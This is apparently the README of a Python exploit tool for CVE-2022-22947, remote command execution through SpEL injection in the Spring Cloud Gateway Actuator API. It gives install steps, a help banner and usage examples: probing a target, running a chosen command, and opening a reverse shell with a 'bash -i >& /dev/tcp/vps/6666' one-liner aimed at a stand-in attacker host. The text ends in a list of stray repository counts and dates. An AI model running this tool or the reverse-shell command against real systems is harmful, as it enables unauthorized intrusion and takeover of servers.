Spring Cloud Gateway Actuator API SpEL表达式注入命令执行(CVE-2022-22947)
1.installation
pip3 install -r requirements.txt
2.Usage
$ python3 spring-cloud-gateway-rce.py -h
___ __ ____ ___ ____ ____ ____ ____ ___ _ _ _____
/ __\ /\ /\ /__\ |___ \ / _ \ |___ \ |___ \ |___ \ |___ \ / _ \ | || | |___ |
/ / \ \ / / /_\ _____ __) || | | | __) | __) | _____ __) | __) || (_) || || |_ / /
/ /___ \ V / //__ |_____| / __/ | |_| | / __/ / __/ |_____| / __/ / __/ \__, ||__ _| / /
\____/ \_/ \__/ |_____| \___/ |_____||_____| |_____||_____| /_/ |_| /_/
CVE-2022-22947 Spring Cloud Gateway RCE
By:K3rwin
usage: spring-cloud-gateway-rce.py [-h] [-u URL] [-c CMD] [-s SYSTEM]
Spring Cloud Gateway RCE 帮助指南
optional arguments:
-h, --help show this help message and exit
-u URL, --url URL 指定url
-c CMD, --cmd CMD 指定执行的命令,默认执行whoami
-s SYSTEM, --system SYSTEM
指定目标主机操作系统,默认linux,参数为win/linux
3.example
① -u 探测漏洞
python3 spring-cloud-gateway-rce.py -u "http://192.168.50.111:8080/"
② -c 指定执行命令
python3 spring-cloud-gateway-rce.py -u "http://192.168.50.111:8080/" -c "ip add"
③ 反弹shell
python3 spring-cloud-gateway-rce.py -u "http://192.168.50.111:8080/" -c "bash -i >& /dev/tcp/vps/6666 0>&1"
docker靶场
vulfocus
253 Jan 05, 2023
57 Dec 16, 2022
4 Aug 31, 2021
2.7k Jan 09, 2023
178 Nov 09, 2022
16 Oct 12, 2022
2 Mar 23, 2022
8 Jan 03, 2023
1 Dec 08, 2021
14 Jun 22, 2022
3 Dec 20, 2022
1 Dec 04, 2021
117 Nov 28, 2022
3 Nov 21, 2022
1 Dec 03, 2021
34 Nov 30, 2022
26 Jan 01, 2023
36 Dec 20, 2022
13 Jul 04, 2021
1 Dec 16, 2021